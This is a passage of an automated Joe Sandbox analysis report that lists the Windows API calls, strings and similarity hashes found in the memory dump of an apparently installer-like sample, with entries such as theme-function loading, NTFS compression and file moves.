• Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: NotifyWinEvent$user32.dll
                                                                                                    • API String ID: 1646373207-597752486
                                                                                                    • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                    • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                                    • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                    • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                    • API String ID: 1646373207-834958232
                                                                                                    • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                    • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                                    • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                    • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                    • API String ID: 2238633743-2683653824
                                                                                                    • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                    • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                                    • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                    • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                                    APIs
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                                    • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2066263336-0
                                                                                                    • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                    • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                                    • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                    • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                                      • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                                    • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountErrorFileLastMoveTick
                                                                                                    • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                    • API String ID: 2406187244-2685451598
                                                                                                    • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                    • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                                    • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                    • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 00413D46
                                                                                                    • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                                      • Part of subcall function 00418EC0: 6FBCC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                                      • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                                    • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorDesktopWindow$Show
                                                                                                    • String ID:
                                                                                                    • API String ID: 2074268717-0
                                                                                                    • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                    • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                                    • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                    • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                                    • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                                    • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString$FileMessageModuleName
                                                                                                    • String ID:
                                                                                                    • API String ID: 704749118-0
                                                                                                    • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                    • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                                    • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                    • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                                      • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                                      • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                                    • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                                    • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 855768636-0
                                                                                                    • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                    • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                                    • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                    • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
APIs
• OffsetRect.USER32(?,?,00000000), ref: 00495988
• OffsetRect.USER32(?,00000000,?), ref: 004959A3
• OffsetRect.USER32(?,?,00000000), ref: 004959BD
• OffsetRect.USER32(?,00000000,?), ref: 004959D8
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: OffsetRect
• String ID:
• API String ID: 177026234-0
• Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
• Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
• Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
• Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
APIs
• GetCursorPos.USER32 ref: 00417260
• SetCursor.USER32(00000000), ref: 004172A3
• GetLastActivePopup.USER32(?), ref: 004172CD
• GetForegroundWindow.USER32(?), ref: 004172D4
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Cursor$ActiveForegroundLastPopupWindow
• String ID:
• API String ID: 1959210111-0
• Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
• Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
• Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
• Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
APIs
• MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
• MulDiv.KERNEL32(?,00000008,?), ref: 00495605
• MulDiv.KERNEL32(?,00000008,?), ref: 00495619
• MulDiv.KERNEL32(?,00000008,?), ref: 00495637
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
• Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
• Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
• Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
APIs
• GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
• UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
• RegisterClassA.USER32(00499598), ref: 0041F4D4
• SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Class$InfoLongRegisterUnregisterWindow
• String ID:
• API String ID: 4025006896-0
• Opcode ID: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
• Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
• Opcode Fuzzy Hash: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
• Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
APIs
• FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
• LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
• SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
• LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
• Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
• Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
• Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
APIs
• GetLastError.KERNEL32(?,00000000), ref: 004705F1
Strings
• Failed to set NTFS compression state (%d)., xrefs: 00470602
• Setting NTFS compression on file: %s, xrefs: 004705BF
• Unsetting NTFS compression on file: %s, xrefs: 004705D7
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
• API String ID: 1452528299-3038984924
• Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
• Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
• Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
• Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
APIs
• GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
Strings
• Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
• Failed to set NTFS compression state (%d)., xrefs: 0046FE56
• Setting NTFS compression on directory: %s, xrefs: 0046FE13
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
• API String ID: 1452528299-1392080489
• Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
• Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
• Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
• Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
• RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
• RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
